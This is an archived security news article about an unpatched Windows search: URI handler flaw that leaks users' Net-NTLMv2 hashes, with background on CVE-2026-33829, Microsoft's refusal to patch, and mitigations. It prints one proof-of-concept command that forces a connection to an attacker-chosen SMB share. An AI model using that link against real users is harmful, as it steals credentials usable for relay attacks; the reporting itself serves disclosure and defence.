Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes
The Hacker NewsArchived Jun 03, 2026✓ Full text saved
Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user's NTLMv2 hash to the attacker. Like in the case of CVE-2026-33829, which impacted the Windows Snipping Tool's ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress. CVE-2026-33829 refers to a spoofing vulnerability that could expose
Full text archived locally
✦ AI Summary· Claude Sonnet
Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes
Ravie LakshmananJun 03, 2026Vulnerability / Network Security
Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user's NTLMv2 hash to the attacker.
Like in the case of CVE-2026-33829, which impacted the Windows Snipping Tool's ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress.
CVE-2026-33829 refers to a spoofing vulnerability that could expose sensitive information to an unauthorized actor. It was patched by Microsoft in April 2026.
"An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message," Microsoft noted in its advisory at the time.
"If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker's choosing, which would disclose the user's NTLMv2 hash to the attacker, who could use this to authenticate as the user."
Specifically, the problem had to do with the fact that the Snipping Tool's URI handler accepted a "filePath" parameter, failed to validate it, and would reach out to any Universal Naming Convention (UNC) path passed to it. This, in turn, could trigger NTLM authentication and expose the victim's Net-NTLMv2 hash to the attacker.
The newly discovered shortcoming achieves the same end goal using "search:" and "crumb=location:" instead of "filePath" using a command like below -
start "" "search:query=test&crumb=location:\\10.0.1.100\share"
"It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating," Huntress researcher Andrew Schwartz said. It's worth noting that the use of a "crumb" parameter to steal the hash (CVE-2023-35636) was documented by Varonis in February 2024.
As a result, a threat actor could leverage the captured hash to conduct relay attacks and gain deeper access into a network. Following responsible disclosure on April 15, 2026, Microsoft declined to address the issue, stating "only Important and Critical severity cases meet our bar for servicing."
In the absence of a fix, it's advised to block outbound SMB (TCP/445 and TCP/139) on hosts that don't need it, enforce SMB signing so that captured hashes can't be relayed against internal services, and disable NTLM where applicable.
Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
SHARE
Tweet
Share
Share
SHARE
Authentication, cybersecurity, Microsoft, network security, NTLM, Relay attack, SMB, Threat Research, Vulnerability, Windows Security
⚡ Top Stories This Week
Google June 2026 Android Update Patches 124 Flaws, One Actively Exploited
Microsoft Slams Public Zero-Day Disclosures Amid GitHub Researcher Account Removal
GlassWorm Malware Takedown Disrupts Developer Supply Chain Attack Infrastructure
⚡ Weekly Recap: New Linux Flaw, PAN-OS Exploit, AI-Powered Attacks, OAuth Phishing and More
ThreatsDay Bulletin: Claude Security Plugin, Azure Priv-Esc, Kali365 MFA Bypass, FIFA Scams +15 More
Oracle WebLogic CVE-2024-21182 Added to KEV Catalog After Active Exploitation
Dashlane Discloses Brute-Force Attack, Encrypted Vaults of Fewer Than 20 Users Downloaded
PAN-OS GlobalProtect Authentication Bypass (CVE-2026-0257) Under Active Exploitation
Microsoft Patches SharePoint RCE Flaw CVE-2026-45659 Across Server Versions
OpenAI Codex Authentication Tokens Stolen in codexui-android npm Supply Chain Attack
Malicious npm Package Stole Files From Claude AI User Directory via GitHub
Miasma Supply Chain Attack Compromises Red Hat npm Packages with Credential-Stealing Worm
ChatGPhish Vulnerability Turns ChatGPT Web Summaries Into a Phishing Surface
Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer
AI Chatbot Recommendations Redirect Users to Cryptojacking Malware Sites
Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit
Load More ▼
⭐ Featured Resources
Your Employees Are Using AI in Ways You Can’t See – 2026 State of AI Report
Learn How to Stop Attacks Before They Reach Your EDR – With PHASR
Watch AI Turn Vulnerabilities Into Working Exploits in Minutes (See the Demo)
[Guide] The Real Security Risks of Shadow AI (And Where You’re Exposed)